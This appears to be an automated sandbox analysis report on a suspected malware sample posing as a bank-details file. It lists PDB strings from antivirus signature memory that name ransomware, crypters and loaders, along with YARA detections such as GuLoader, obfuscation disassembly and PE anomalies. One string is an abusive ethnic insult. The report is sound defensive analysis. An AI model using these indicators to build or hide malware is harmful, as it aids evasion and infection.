Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 00000023.00000003.18320569449.0000015B1B556000.00000004.00000001.sdmp
Source: Binary string: \starter.pdb source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp
Source: Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: sdmf|er.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb] source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: Pb730.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 00000023.00000003.18300879046.0000015B1A6C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: SKRFM.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: arc\Release\arc.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: DownExecute.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp
Source: Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000023.00000003.18336377296.0000015B1BE9E000.00000004.00000001.sdmp
Source: Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000023.00000003.18338076360.0000015B1B388000.00000004.00000001.sdmp
Source: Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: upE:\\WORK\\WORK_PECEPB\\Work_2012 Private\\.*\\Silence_lock_bot\\Silence_lock_bot\\Release\\Silence_lock_bot.pdb source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: module_ls.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.17634386230.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Yara detected Costura Assembly Loader
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332888598.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18351572125.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18282718286.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18294299849.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c22da.163.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c22da.69.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18300906087.0000015B1A6C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Binary or sample is protected by dotNetProtector
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
PE file contains an invalid checksum
Source: mpasbase.vdm.35.dr Static PE information: real checksum: 0x329e303 should be:
Source: mpavbase.vdm.35.dr Static PE information: real checksum: 0x354a210 should be:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00414356 push eax; ret 1_2_004147B5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404A4A push edx; iretd 1_2_00404A75
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404252 push eax; iretd 1_2_00404251
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404A5E push edx; iretd 1_2_00404A75
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402E00 push edx; iretd 1_2_00402E01
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040562D push edi; iretd 1_2_00405661
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004052C1 pushfd ; retf 1_2_00405307
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004048C4 push edi; iretd 1_2_004048C5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004040D2 push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004040DE push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004076EF pushfd ; retf 1_2_004076F3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004068F0 push eax; iretd 1_2_004068FD
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004058F6 push edx; iretd 1_2_004058F9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004082F9 push eax; iretd 1_2_00408305
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00406E91 push ecx; iretd 1_2_00406E9D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00408298 push ebx; iretd 1_2_00408299
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00406C9E push eax; iretd 1_2_00406ED5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00406EBF push eax; iretd 1_2_00406ED5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00403948 push ecx; iretd 1_2_00403949
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040416E push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404112 push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00405F20 push esi; iretd 1_2_00405F21
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004061CE push esi; iretd 1_2_004061E5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004055CF push edi; iretd 1_2_00405661
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004059E4 push edi; iretd 1_2_004059E5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040638D push 569795EEh; iretd 1_2_004063A5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402F9E push esi; iretd 1_2_00402FA1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004059A0 push eax; iretd 1_2_004059A1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004041BB push eax; iretd 1_2_00404251
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004043BB push edx; iretd 1_2_004043C1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_02222001 push es; iretd 1_2_02221FC0
Binary contains a suspicious time stamp
Source: ConfigSecurityPolicy.exe.41.dr Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]
PE file contains sections with non-standard names
Source: MpCmdRun.exe.41.dr Static PE information: section name: .didat
Source: NisSrv.exe.41.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.41.dr Static PE information: section name: .didat
